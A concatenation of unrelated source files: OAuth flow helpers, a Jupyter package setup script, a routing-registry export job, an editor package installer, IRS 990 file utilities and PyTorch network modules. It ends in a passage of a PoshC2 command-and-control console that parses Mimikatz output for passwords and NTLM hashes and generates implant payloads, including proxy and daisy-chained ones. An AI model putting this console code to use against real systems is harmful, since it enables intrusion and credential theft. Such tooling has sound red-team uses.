ValueError: If the client configuration is not in the correct
format.
.. _client secrets:
https://github.com/googleapis/google-api-python-client/blob/main/docs/client-secrets.md
"""
if "web" in client_config:
client_type = "web"
elif "installed" in client_config:
client_type = "installed"
else:
raise ValueError("Client secrets must be for a web or installed app.")
# these args cannot be passed to requests_oauthlib.OAuth2Session
code_verifier = kwargs.pop("code_verifier", None)
autogenerate_code_verifier = kwargs.pop("autogenerate_code_verifier", None)
(
session,
client_config,
) = google_auth_oauthlib.helpers.session_from_client_config(
client_config, scopes, **kwargs
)
redirect_uri = kwargs.get("redirect_uri", None)
return cls(
session,
client_type,
client_config,
redirect_uri,
code_verifier,
autogenerate_code_verifier,
)
@classmethod
def from_client_secrets_file(cls, client_secrets_file, scopes, **kwargs):
"""Creates a :class:`Flow` instance from a Google client secrets file.
Args:
client_secrets_file (str): The path to the client secrets .json
file.
scopes (Sequence[str]): The list of scopes to request during the
flow.
kwargs: Any additional parameters passed to
:class:`requests_oauthlib.OAuth2Session`
Returns:
Flow: The constructed Flow instance.
"""
with open(client_secrets_file, "r") as json_file:
client_config = json.load(json_file)
return cls.from_client_config(client_config, scopes=scopes, **kwargs)
@property
def redirect_uri(self):
"""The OAuth 2.0 redirect URI. Pass-through to
``self.oauth2session.redirect_uri``."""
return self.oauth2session.redirect_uri
@redirect_uri.setter
def redirect_uri(self, value):
self.oauth2session.redirect_uri = value
def authorization_url(self, **kwargs):
"""Generates an authorization URL.
This is the first step in the OAuth 2.0 Authorization Flow. The user's
browser should be redirected to the returned URL.
This method calls
:meth:`requests_oauthlib.OAuth2Session.authorization_url`
and specifies the client configuration's authorization URI (usually
Google's authorization server) and specifies that "offline" access is
desired. This is required in order to obtain a refresh token.
Args:
kwargs: Additional arguments passed through to
:meth:`requests_oauthlib.OAuth2Session.authorization_url`
Returns:
Tuple[str, str]: The generated authorization URL and state. The
user must visit the URL to complete the flow. The state is used
when completing the flow to verify that the request originated
from your application. If your application is using a different
:class:`Flow` instance to obtain the token, you will need to
specify the ``state`` when constructing the :class:`Flow`.
"""
kwargs.setdefault("access_type", "offline")
if self.autogenerate_code_verifier:
chars = ascii_letters + digits + "-._~"
rnd = SystemRandom()
random_verifier = [rnd.choice(chars) for _ in range(0, 128)]
self.code_verifier = "".join(random_verifier)
if self.code_verifier:
code_hash = hashlib.sha256()
code_hash.update(str.encode(self.code_verifier))
unencoded_challenge = code_hash.digest()
b64_challenge = urlsafe_b64encode(unencoded_challenge)
code_challenge = b64_challenge.decode().split("=")[0]
kwargs.setdefault("code_challenge", code_challenge)
kwargs.setdefault("code_challenge_method", "S256")
url, state = self.oauth2session.authorization_url(
self.client_config["auth_uri"], **kwargs
)
return url, state
def fetch_token(self, **kwargs):
"""Completes the Authorization Flow and obtains an access token.
This is the final step in the OAuth 2.0 Authorization Flow. This is
called after the user consents.
This method calls
:meth:`requests_oauthlib.OAuth2Session.fetch_token`
and specifies the client configuration's token URI (usually Google's
token server).
Args:
kwargs: Arguments passed through to
:meth:`requests_oauthlib.OAuth2Session.fetch_token`. At least
one of ``code`` or ``authorization_response`` must be
specified.
Returns:
Mapping[str, str]: The obtained tokens. Typically, you will not use
return value of this function and instead and use
:meth:`credentials` to obtain a
:class:`~google.auth.credentials.Credentials` instance.
"""
kwargs.setdefault("client_secret", self.client_config["client_secret"])
kwargs.setdefault("code_verifier", self.code_verifier)
return self.oauth2session.fetch_token(self.client_config["token_uri"], **kwargs)
@property
def credentials(self):
"""Returns credentials from the OAuth 2.0 session.
:meth:`fetch_token` must be called before accessing this. This method
constructs a :class:`google.oauth2.credentials.Credentials` class using
the session's token and the client config.
Returns:
google.oauth2.credentials.Credentials: The constructed credentials.
Raises:
ValueError: If there is no access token in the session.
"""
return google_auth_oauthlib.helpers.credentials_from_session(
self.oauth2session, self.client_config
)
def authorized_session(self):
"""Returns a :class:`requests.Session` authorized with credentials.
:meth:`fetch_token` must be called before this method. This method
constructs a :class:`google.auth.transport.requests.AuthorizedSession`
class using this flow's :attr:`credentials`.
Returns:
google.auth.transport.requests.AuthorizedSession: The constructed
session.
"""
return google.auth.transport.requests.AuthorizedSession(self.credentials)
class InstalledAppFlow(Flow):
"""Authorization flow helper for installed applications.
This :class:`Flow` subclass makes it easier to perform the
`Installed Application Authorization Flow`_. This flow is useful for
local development or applications that are installed on a desktop operating
system.
This flow has two strategies: The console strategy provided by
:meth:`run_console` and the local server strategy provided by
:meth:`run_local_server`.
Example::
from google_auth_oauthlib.flow import InstalledAppFlow
flow = InstalledAppFlow.from_client_secrets_file(
'client_secrets.json',
scopes=['profile', 'email'])
flow.run_local_server()
session = flow.authorized_session()
profile_info = session.get(
'https://www.googleapis.com/userinfo/v2/me').json()
print(profile_info)
# {'name': '...', 'email': '...', ...}
Note that these aren't the only two ways to accomplish the installed
application flow, they are just the most common ways. You can use the
:class:`Flow` class to perform the same flow with different methods of
presenting the authorization URL to the user or obtaining the authorization
response, such as using an embedded web view.
.. _Installed Application Authorization Flow:
https://github.com/googleapis/google-api-python-client/blob/main/docs/oauth-installed.md
"""
_OOB_REDIRECT_URI = "urn:ietf:wg:oauth:2.0:oob"
_DEFAULT_AUTH_PROMPT_MESSAGE = (
"Please visit this URL to authorize this application: {url}"
)
"""str: The message to display when prompting the user for
authorization."""
_DEFAULT_AUTH_CODE_MESSAGE = "Enter the authorization code: "
"""str: The message to display when prompting the user for the
authorization code. Used only by the console strategy."""
_DEFAULT_WEB_SUCCESS_MESSAGE = (
"The authentication flow has completed. You may close this window."
)
def run_console(
self,
authorization_prompt_message=_DEFAULT_AUTH_PROMPT_MESSAGE,
authorization_code_message=_DEFAULT_AUTH_CODE_MESSAGE,
**kwargs
):
"""Run the flow using the console strategy.
The console strategy instructs the user to open the authorization URL
in their browser. Once the authorization is complete the authorization
server will give the user a code. The user then must copy & paste this
code into the application. The code is then exchanged for a token.
Args:
authorization_prompt_message (str): The message to display to tell
the user to navigate to the authorization URL.
authorization_code_message (str): The message to display when
prompting the user for the authorization code.
kwargs: Additional keyword arguments passed through to
:meth:`authorization_url`.
Returns:
google.oauth2.credentials.Credentials: The OAuth 2.0 credentials
for the user.
"""
kwargs.setdefault("prompt", "consent")
self.redirect_uri = self._OOB_REDIRECT_URI
auth_url, _ = self.authorization_url(**kwargs)
print(authorization_prompt_message.format(url=auth_url))
code = input(authorization_code_message)
self.fetch_token(code=code)
return self.credentials
def run_local_server(
self,
host="localhost",
port=8080,
authorization_prompt_message=_DEFAULT_AUTH_PROMPT_MESSAGE,
success_message=_DEFAULT_WEB_SUCCESS_MESSAGE,
open_browser=True,
redirect_uri_trailing_slash=True,
**kwargs
):
"""Run the flow using the server strategy.
The server strategy instructs the user to open the authorization URL in
their browser and will attempt to automatically open the URL for them.
It will start a local web server to listen for the authorization
response. Once authorization is complete the authorization server will
redirect the user's browser to the local web server. The web server
will get the authorization code from the response and shutdown. The
code is then exchanged for a token.
Args:
host (str): The hostname for the local redirect server. This will
be served over http, not https.
port (int): The port for the local redirect server.
authorization_prompt_message (str): The message to display to tell
the user to navigate to the authorization URL.
success_message (str): The message to display in the web browser
the authorization flow is complete.
open_browser (bool): Whether or not to open the authorization URL
in the user's browser.
redirect_uri_trailing_slash (bool): whether or not to add trailing
slash when constructing the redirect_uri. Default value is True.
kwargs: Additional keyword arguments passed through to
:meth:`authorization_url`.
Returns:
google.oauth2.credentials.Credentials: The OAuth 2.0 credentials
for the user.
"""
wsgi_app = _RedirectWSGIApp(success_message)
# Fail fast if the address is occupied
wsgiref.simple_server.WSGIServer.allow_reuse_address = False
local_server = wsgiref.simple_server.make_server(
host, port, wsgi_app, handler_class=_WSGIRequestHandler
)
redirect_uri_format = (
"http://{}:{}/" if redirect_uri_trailing_slash else "http://{}:{}"
)
self.redirect_uri = redirect_uri_format.format(host, local_server.server_port)
auth_url, _ = self.authorization_url(**kwargs)
if open_browser:
webbrowser.open(auth_url, new=1, autoraise=True)
print(authorization_prompt_message.format(url=auth_url))
local_server.handle_request()
# Note: using https here because oauthlib is very picky that
# OAuth 2.0 should only occur over https.
authorization_response = wsgi_app.last_request_uri.replace("http", "https")
self.fetch_token(authorization_response=authorization_response)
# This closes the socket
local_server.server_close()
return self.credentials
class _WSGIRequestHandler(wsgiref.simple_server.WSGIRequestHandler):
"""Custom WSGIRequestHandler.
Uses a named logger instead of printing to stderr.
"""
def log_message(self, format, *args):
# pylint: disable=redefined-builtin
# (format is the argument name defined in the superclass.)
_LOGGER.info(format, *args)
class _RedirectWSGIApp(object):
"""WSGI app to handle the authorization redirect.
Stores the request URI and displays the given success message.
"""
def __init__(self, success_message):
"""
Args:
success_message (str): The message to display in the web browser
the authorization flow is complete.
"""
self.last_request_uri = None
self._success_message = success_message
def __call__(self, environ, start_response):
"""WSGI Callable.
Args:
environ (Mapping[str, Any]): The WSGI environment.
start_response (Callable[str, list]): The WSGI start_response
callable.
Returns:
Iterable[bytes]: The response body.
"""
start_response("200 OK", [("Content-type", "text/plain; charset=utf-8")])
self.last_request_uri = wsgiref.util.request_uri(environ)
return [self._success_message.encode("utf-8")]
|
the-stack_106_14883
|
import os
from distutils import log
from os.path import join as pjoin
from jupyter_packaging import (
combine_commands,
create_cmdclass,
ensure_targets,
get_version,
install_npm,
)
from setuptools import find_packages, setup
here = os.path.dirname(os.path.abspath(__file__))
log.set_verbosity(log.DEBUG)
log.info("setup.py entered")
log.info("$PATH=%s" % os.environ["PATH"])
name = "jupyter_rfb"
LONG_DESCRIPTION = "Remote Frame Buffer for Jupyter"
# Get jupyter_rfb version
version = get_version(pjoin(name, "_version.py"))
js_dir = pjoin(here, "js")
# Representative files that should exist after a successful build
jstargets = [
pjoin(js_dir, "dist", "index.js"),
]
data_files_spec = [
("share/jupyter/nbextensions/jupyter_rfb", "jupyter_rfb/nbextension", "*.*"),
("share/jupyter/labextensions/jupyter_rfb", "jupyter_rfb/labextension", "**"),
("share/jupyter/labextensions/jupyter_rfb", ".", "install.json"),
("etc/jupyter/nbconfig/notebook.d", ".", "jupyter_rfb.json"),
]
cmdclass = create_cmdclass("jsdeps", data_files_spec=data_files_spec)
cmdclass["jsdeps"] = combine_commands(
install_npm(js_dir, npm=["yarn"], build_cmd="build:prod"),
ensure_targets(jstargets),
)
setup_args = dict(
name=name,
version=version,
description="Remote Frame Buffer for Jupyter",
long_description=LONG_DESCRIPTION,
include_package_data=True,
install_requires=[
"numpy",
"ipywidgets>=7.6.0",
],
python_requires=">=3.6",
packages=find_packages(),
zip_safe=False,
cmdclass=cmdclass,
author="Almar Klein",
author_email="[email protected]",
license="MIT",
url="https://github.com/vispy/jupyter_rfb",
keywords=[
"ipython",
"jupyter",
"widgets",
"visualization",
"remote frame buffer",
],
classifiers=[
"Development Status :: 4 - Beta",
"Framework :: IPython",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Topic :: Multimedia :: Graphics",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
)
setup(**setup_args)
|
the-stack_106_14887
|
import os
import gzip
import logging
import shutil
from pathlib import Path
from tempfile import NamedTemporaryFile
from irrd.conf import get_setting
from irrd.rpki.status import RPKIStatus
from irrd.storage.database_handler import DatabaseHandler
from irrd.storage.queries import RPSLDatabaseQuery, DatabaseStatusQuery
from irrd.utils.text import remove_auth_hashes
EXPORT_PERMISSIONS = 0o644
logger = logging.getLogger(__name__)
class SourceExportRunner:
"""
This SourceExportRunner is the entry point for the expect process
for a single source.
A gzipped file will be created in the export_destination directory
with the contents of the source, along with a CURRENTSERIAL file.
The contents of the source are first written to a temporary file, and
then moved in place.
"""
def __init__(self, source: str) -> None:
self.source = source
def run(self) -> None:
self.database_handler = DatabaseHandler()
try:
export_destination = get_setting(f'sources.{self.source}.export_destination')
logger.info(f'Starting a source export for {self.source} to {export_destination}')
self._export(export_destination)
self.database_handler.commit()
except Exception as exc:
logger.error(f'An exception occurred while attempting to run an export '
f'for {self.source}: {exc}', exc_info=exc)
finally:
self.database_handler.close()
def _export(self, export_destination):
filename_export = Path(export_destination) / f'{self.source.lower()}.db.gz'
export_tmpfile = NamedTemporaryFile(delete=False)
filename_serial = Path(export_destination) / f'{self.source.upper()}.CURRENTSERIAL'
query = DatabaseStatusQuery().source(self.source)
try:
serial = next(self.database_handler.execute_query(query))['serial_newest_seen']
except StopIteration:
logger.error(f'Unable to run export for {self.source}, internal database status is empty.')
return
with gzip.open(export_tmpfile, 'wb') as fh:
query = RPSLDatabaseQuery().sources([self.source])
query = query.rpki_status([RPKIStatus.not_found, RPKIStatus.valid])
for obj in self.database_handler.execute_query(query):
object_bytes = remove_auth_hashes(obj['object_text']).encode('utf-8')
fh.write(object_bytes + b'\n')
fh.write(b'# EOF\n')
os.chmod(export_tmpfile.name, EXPORT_PERMISSIONS)
if filename_export.exists():
os.unlink(filename_export)
if filename_serial.exists():
os.unlink(filename_serial)
shutil.move(export_tmpfile.name, filename_export)
if serial is not None:
with open(filename_serial, 'w') as fh:
fh.write(str(serial))
os.chmod(filename_serial, EXPORT_PERMISSIONS)
self.database_handler.record_serial_exported(self.source, serial)
logger.info(f'Export for {self.source} complete at serial {serial}, stored in {filename_export} / {filename_serial}')
|
the-stack_106_14888
|
import re
import threading
import time
import sublime
from .thread_progress import ThreadProgress
from .package_manager import PackageManager
from .package_disabler import PackageDisabler
from .versions import version_comparable
from .commands.advanced_install_package_command import AdvancedInstallPackageThread
USE_QUICK_PANEL_ITEM = hasattr(sublime, 'QuickPanelItem')
class PackageInstaller(PackageDisabler):
"""
Provides helper functionality related to installing packages
"""
def __init__(self):
PackageDisabler.__init__(self)
self.manager = PackageManager()
self.debug = self.manager.settings.get('debug')
# Track what the color scheme was before upgrade so we can restore it
self.old_color_scheme_package = None
self.old_color_scheme = None
# Track what the theme was before upgrade so we can restore it
self.old_theme_package = None
self.old_theme = None
def make_package_list(self, ignore_actions=[], override_action=None, ignore_packages=[]):
"""
Creates a list of packages and what operation would be performed for
each. Allows filtering by the applicable action or package name.
Returns the information in a format suitable for displaying in the
quick panel.
:param ignore_actions:
A list of actions to ignore packages by. Valid actions include:
`install`, `upgrade`, `downgrade`, `reinstall`, `overwrite`,
`pull` and `none`. `pull` and `none` are for Git and Hg
repositories. `pull` is present when incoming changes are detected,
where as `none` is selected if no commits are available. `overwrite`
is for packages that do not include version information via the
`package-metadata.json` file.
:param override_action:
A string action name to override the displayed action for all listed
packages.
:param ignore_packages:
A list of packages names that should not be returned in the list
:return:
A list of lists, each containing three strings:
0 - package name
1 - package description
2 - action; [extra info;] package url
"""
packages = self.manager.list_available_packages()
installed_packages = self.manager.list_packages()
package_list = []
for package in sorted(iter(packages.keys()), key=lambda s: s.lower()):
if ignore_packages and package in ignore_packages:
continue
info = packages[package]
release = info['releases'][0]
if package in installed_packages:
installed = True
metadata = self.manager.get_metadata(package)
if self.debug: print('package', package, 'metadata', metadata.get('version'), 'release_version', release['version'])
if metadata.get('version'):
installed_version = metadata['version']
else:
installed_version = None
else:
installed = False
installed_version_name = 'v' + installed_version if \
installed and installed_version else 'unknown version'
new_version = 'v' + release['version']
vcs = None
settings = self.manager.settings
if override_action:
action = override_action
extra = ''
else:
if self.manager.is_vcs_package(package):
to_ignore = settings.get('ignore_vcs_packages')
if to_ignore is True:
continue
if isinstance(to_ignore, list) and package in to_ignore:
continue
upgrader = self.manager.instantiate_upgrader(package)
vcs = upgrader.cli_name
incoming = upgrader.incoming()
if installed:
if vcs:
if incoming:
action = 'pull'
extra = ' with ' + vcs
else:
action = 'none'
extra = ''
elif not installed_version:
action = 'overwrite'
extra = ' %s with %s' % (installed_version_name, new_version)
else:
installed_version = version_comparable(installed_version)
new_version_cmp = version_comparable(release['version'])
if new_version_cmp > installed_version:
action = 'upgrade'
extra = ' to %s from %s' % (new_version, installed_version_name)
elif new_version_cmp < installed_version:
action = 'downgrade'
extra = ' to %s from %s' % (new_version, installed_version_name)
else:
action = 'reinstall'
extra = ' %s' % new_version
else:
action = 'install'
extra = ' %s' % new_version
extra += ';'
if action in ignore_actions:
continue
description = info.get('description')
if not description:
description = 'No description provided'
homepage = info['homepage']
homepage_display = re.sub('^https?://', '', homepage)
if USE_QUICK_PANEL_ITEM:
description = '<em>%s</em>' % sublime.html_format_command(description)
final_line = '<em>' + action + extra + '</em>'
if homepage_display:
if action or extra:
final_line += ' '
final_line += '<a href="%s">%s</a>' % (homepage, homepage_display)
package_entry = sublime.QuickPanelItem(package, [description, final_line])
else:
package_entry = [package]
package_entry.append(description)
final_line = action + extra
if final_line and homepage_display:
final_line += ' '
final_line += homepage_display
package_entry.append(final_line)
package_list.append(package_entry)
return package_list
def on_done(self, picked):
"""
Quick panel user selection handler - disables a package, installs or
upgrades it, then re-enables the package
:param picked:
An integer of the 0-based package name index from the presented
list. -1 means the user cancelled.
"""
if picked == -1:
return
if USE_QUICK_PANEL_ITEM:
name = self.package_list[picked].trigger
else:
name = self.package_list[picked][0]
thread = AdvancedInstallPackageThread(name)
thread.start()
ThreadProgress(
thread,
'Installing package %s' % name,
'Package %s successfully %s' % (name, self.completion_type)
)
class PackageInstallerThread(threading.Thread):
"""
A thread to run package install/upgrade operations in so that the main
Sublime Text thread does not get blocked and freeze the UI
"""
def __init__(self, manager, package, on_complete, pause=False):
"""
:param manager:
An instance of :class:`PackageManager`
:param package:
The string package name to install/upgrade
:param on_complete:
A callback to run after installing/upgrading the package
:param pause:
If we should pause before upgrading to allow a package to be
fully disabled.
"""
self.package = package
self.manager = manager
self.on_complete = on_complete
self.pause = pause
threading.Thread.__init__(self)
def run(self):
if self.pause:
time.sleep(0.7)
try:
self.result = self.manager.install_package(self.package)
except (Exception):
self.result = False
raise
finally:
# Do not reenable if deferred until next restart
if self.on_complete and self.result is not None:
sublime.set_timeout(self.on_complete, 700)
|
the-stack_106_14891
|
import re
import os
import requests
from datetime import datetime
from .settings import IRS_XML_HTTP_BASE, WORKING_DIRECTORY, INDEX_DIRECTORY
OBJECT_ID_RE = re.compile(r'20\d{16}')
# Not sure how much detail we need to go into here
OBJECT_ID_MSG = """
This appears not to be an IRS object id.
The ID should be 18 digits long and start with
the four digit year, e.g. 201642229349300909
To find the object id, see the yearly index csv files.
"""
def stream_download(url, target_path, verbose=False):
""" Download a large file without loading it into memory. """
response = requests.get(url, stream=True)
handle = open(target_path, "wb")
if verbose:
print("Beginning streaming download of %s" % url)
start = datetime.now()
try:
content_length = int(response.headers['Content-Length'])
content_MB = content_length/1048576.0
print("Total file size: %.2f MB" % content_MB)
except KeyError:
pass # allow Content-Length to be missing
for chunk in response.iter_content(chunk_size=512):
if chunk: # filter out keep-alive new chunks
handle.write(chunk)
if verbose:
print(
"Download completed to %s in %s" %
(target_path, datetime.now() - start))
def validate_object_id(object_id):
""" It's easy to make a mistake entering these, validate the format """
result = re.match(OBJECT_ID_RE, str(object_id))
if not result:
print("'%s' appears not to be a valid 990 object_id" % object_id)
raise RuntimeError(OBJECT_ID_MSG)
return object_id
def get_s3_URL(object_id):
return ("%s/%s_public.xml" % (IRS_XML_HTTP_BASE, object_id))
def get_local_path(object_id):
file_name = "%s_public.xml" % object_id
return os.path.join(WORKING_DIRECTORY, file_name)
def get_index_file_URL(year):
return ("%s/index_%s.csv" % (IRS_XML_HTTP_BASE, year))
def get_local_index_path(year):
csv_file_name = "index_%s.csv" % year
return os.path.join(INDEX_DIRECTORY, csv_file_name)
|
the-stack_106_14893
|
#######################################################################
# Copyright (C) 2017 Shangtong Zhang([email protected]) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from .network_utils import *
### tsa ###
class MLPBody(nn.Module):
def __init__(self, input_dim, feature_dim=512, hidden_dim=512):
super().__init__()
self.fc1 = layer_init(nn.Linear(input_dim, hidden_dim))
self.fc2 = layer_init(nn.Linear(hidden_dim, feature_dim))
self.feature_dim = feature_dim
def forward(self, x):
return self.fc2(F.relu(self.fc1(x.view(x.size(0), -1))))
class TSAConvBody(nn.Module):
def __init__(self, in_channels=12, feature_dim=512, scale=1, gate=F.relu):
super().__init__()
self.feature_dim = feature_dim
self.conv1_1 = layer_init(nn.Conv2d(in_channels, 32, kernel_size=3, padding=1)) # 16->16
self.conv1_2 = layer_init(nn.Conv2d(32, 32, stride=2, kernel_size=3, padding=1)) # 16->8
self.conv2_1 = layer_init(nn.Conv2d(32, 32, kernel_size=3, padding=1)) # 8->8
self.conv2_2 = layer_init(nn.Conv2d(32, 64, stride=2, kernel_size=3, padding=1)) # 8->4
self.conv3_1 = layer_init(nn.Conv2d(64, 64, kernel_size=3, padding=1)) # 4->4
self.conv3_2 = layer_init(nn.Conv2d(64, 128, stride=2,kernel_size=3, padding=1)) # 4->2
self.conv4_1 = layer_init(nn.Conv2d(128, 128, kernel_size=3, padding=1)) # 2->2
self.conv4_2 = layer_init(nn.Conv2d(128, 128, kernel_size=3, padding=1)) # 2->2
self.fc = layer_init(nn.Linear(2 * scale * 2 * scale * 128, self.feature_dim))
self.gate = gate
def forward(self, x): # you must add relu between every ConvNet!
y = self.gate(self.conv1_2(self.gate(self.conv1_1(x))))
y = self.gate(self.conv2_2(self.gate(self.conv2_1(y))))
y = self.gate(self.conv3_2(self.gate(self.conv3_1(y))))
y = self.gate(self.conv4_2(self.gate(self.conv4_1(y))))
y = y.view(y.size(0), -1)
y = self.gate(self.fc(y))
return y
class TSAMiniConvBody(nn.Module):
def __init__(self, in_channels=12, feature_dim=512, scale=1, gate=F.relu): # scale only works for 2^n
super().__init__()
self.feature_dim = feature_dim
self.conv1 = layer_init(nn.Conv2d(in_channels, 32, stride=2, kernel_size=3, padding=1)) # 16->8
self.conv2 = layer_init(nn.Conv2d(32, 64, stride=2, kernel_size=3, padding=1)) # 8->4
self.conv3 = layer_init(nn.Conv2d(64, 128, stride=2,kernel_size=3, padding=1)) # 4->2
self.fc = layer_init(nn.Linear(2 * scale * 2 * scale * 128, self.feature_dim))
self.gate = gate
def forward(self, x):
y = self.gate(self.conv1(x))
y = self.gate(self.conv2(y))
y = self.gate(self.conv3(y))
y = y.view(y.size(0), -1)
y = self.gate(self.fc(y))
return y
### end of tsa ###
class NatureConvBody(nn.Module):
def __init__(self, in_channels=4):
super(NatureConvBody, self).__init__()
self.feature_dim = 512
self.conv1 = layer_init(nn.Conv2d(in_channels, 32, kernel_size=8, stride=4))
self.conv2 = layer_init(nn.Conv2d(32, 64, kernel_size=4, stride=2))
self.conv3 = layer_init(nn.Conv2d(64, 64, kernel_size=3, stride=1))
self.fc4 = layer_init(nn.Linear(7 * 7 * 64, self.feature_dim))
def forward(self, x):
y = F.relu(self.conv1(x))
y = F.relu(self.conv2(y))
y = F.relu(self.conv3(y))
y = y.view(y.size(0), -1)
y = F.relu(self.fc4(y))
return y
class FCBody(nn.Module):
def __init__(self, state_dim, hidden_units=(64, 64), gate=F.relu):
super(FCBody, self).__init__()
dims = (state_dim, ) + hidden_units
self.layers = nn.ModuleList([layer_init(nn.Linear(dim_in, dim_out)) for dim_in, dim_out in zip(dims[:-1], dims[1:])])
self.gate = gate
self.feature_dim = dims[-1]
def forward(self, x):
for layer in self.layers:
x = self.gate(layer(x))
return x
class DummyBody(nn.Module):
def __init__(self, state_dim):
super(DummyBody, self).__init__()
self.feature_dim = state_dim
def forward(self, x):
return x
|
the-stack_106_14894
|
#!/usr/bin/env python3
import sys, re, os, time, subprocess, traceback, signal, argparse, readline
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
from DB import get_newimplanturl, get_implantbyid, get_implants, get_history_dict, get_lastcommand
from DB import new_commandhistory, get_c2urls, del_autorun, del_autoruns, add_autorun, get_autorun, get_newtasks_all
from DB import drop_newtasks, get_implanttype, get_history, get_randomuri, get_hostdetails
from Colours import Colours
from Config import PayloadsDirectory, POSHDIR
from HTML import generate_table, graphviz
from TabComplete import tabCompleter
from Payloads import Payloads
from Utils import validate_sleep_time, randomuri
from PyHandler import handle_py_command
from SharpHandler import handle_sharp_command
from PSHandler import handle_ps_command
if os.name == 'nt':
import pyreadline.rlmain
def catch_exit(signum, frame):
sys.exit(0)
def process_mimikatz(lines):
# code source https://github.com/stufus/parse-mimikatz-log/blob/master/pml.py
main_count = 0
current = {}
all = []
for line in lines.split('\n'):
main_count += 1
val = re.match(r'^\s*\*\s+Username\s+:\s+(.+)\s*$', line.strip())
if val is not None:
x = process_mimikatzout(current)
if x not in all:
if x is not None:
all.append(x)
current = {}
current['Username'] = val.group(1).strip()
continue
val = re.match(r'^\s*\*\s+(Domain|NTLM|SHA1|Password)\s+:\s+(.+)\s*$', line.strip())
if val is not None:
if val.group(2).count(" ") < 10:
current[val.group(1).strip()] = val.group(2)
return all
def process_mimikatzout(current):
fields = ['Domain', 'Username', 'NTLM', 'SHA1', 'Password']
for f in fields:
if f in current:
if current[f] == '(null)':
current[f] = ''
else:
current[f] = ''
if current['Username'] != '' and (current['Password'] != '' or current['NTLM'] != ''):
return current['Username'], current['Password'], current['NTLM']
def createproxypayload(user, startup):
proxyuser = input("Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
update_item("ProxyURL", "C2Server", proxyurl)
update_item("ProxyUser", "C2Server", proxyuser)
update_item("ProxyPass", "C2Server", proxypass)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
newPayload.CreateRaw("Proxy")
newPayload.CreateDlls("Proxy")
newPayload.CreateShellcode("Proxy")
newPayload.CreateEXE("Proxy")
newPayload.CreateMsbuild("Proxy")
new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire)
startup(user, "Created new proxy payloads")
def createdaisypayload(user, startup):
name = input("Daisy name: e.g. DC1 ")
domain = input("Domain or URL: https://www.example.com ")
daisyurl = input("Daisy host: .e.g. http://10.150.10.1 ")
if (daisyurl == "http://127.0.0.1"):
daisyurl = "http://localhost"
if (daisyurl == "https://127.0.0.1"):
daisyurl = "https://localhost"
daisyport = input("Daisy port: .e.g. 8888 ")
daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "",
"", proxynone, C2[19], C2[20],
C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (daisyurl + ":" + daisyport), "$pid;%s@%s" % (daisyhost[11], daisyhost[3]))
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
new_urldetails(name, C2[1], C2[3], domain, daisyurl, daisyhostid, "")
startup(user, "Created new %s daisy payloads" % name)
def createnewpayload(user, startup):
domain = input("Domain or URL: https://www.example.com ")
domainbase = (domain.lower()).replace('https://', '')
domainbase = domainbase.replace('http://', '')
domainfront = input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
randomid = randomuri(5)
proxyuser = ""
proxypass = ""
credsexpire = ""
if proxyurl:
proxyuser = input("Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
imurl = "%s?p" % get_newimplanturl()
domainbase = "Proxy%s%s" % (domainbase, randomid)
else:
domainbase = "%s%s" % (randomid, domainbase)
imurl = get_newimplanturl()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser,
proxypass, proxyurl, "", "", C2[19], C2[20],
C2[21], imurl, PayloadsDirectory)
newPayload.CreateRaw("%s_" % domainbase)
newPayload.CreateDlls("%s_" % domainbase)
newPayload.CreateShellcode("%s_" % domainbase)
newPayload.CreateEXE("%s_" % domainbase)
newPayload.CreateMsbuild("%s_" % domainbase)
newPayload.CreatePython("%s_" % domainbase)
new_urldetails(randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
startup(user, "Created new payloads")
def complete(text, state):
for cmd in COMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def startup(user, printhelp=""):
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN)
print(logopic)
try:
if user is not None:
print("User: " + Colours.END + Colours.BLUE + "%s%s" % (user, Colours.END))
print("")
ii = get_implants()
if ii:
for i in ii:
ID = i[0]
LastSeen = i[7]
Hostname = i[3]
Domain = i[11]
DomainUser = i[2]
Arch = i[10]
PID = i[8]
Pivot = i[15]
Sleep = i[13].strip()
Label = i[16]
pivot_original = Pivot
if pivot_original.startswith("PS"):
Pivot = "PS"
elif pivot_original.startswith("C#"):
Pivot = "C#"
elif pivot_original.startswith("Python"):
Pivot = "PY"
if "Daisy" in pivot_original:
Pivot = Pivot + ";D"
if "Proxy" in pivot_original:
Pivot = Pivot + ";P"
from datetime import datetime, timedelta
LastSeenTime = datetime.strptime(LastSeen, "%d/%m/%Y %H:%M:%S")
now = datetime.now()
if(Sleep.endswith('s')):
sleep_int = int(Sleep[:-1])
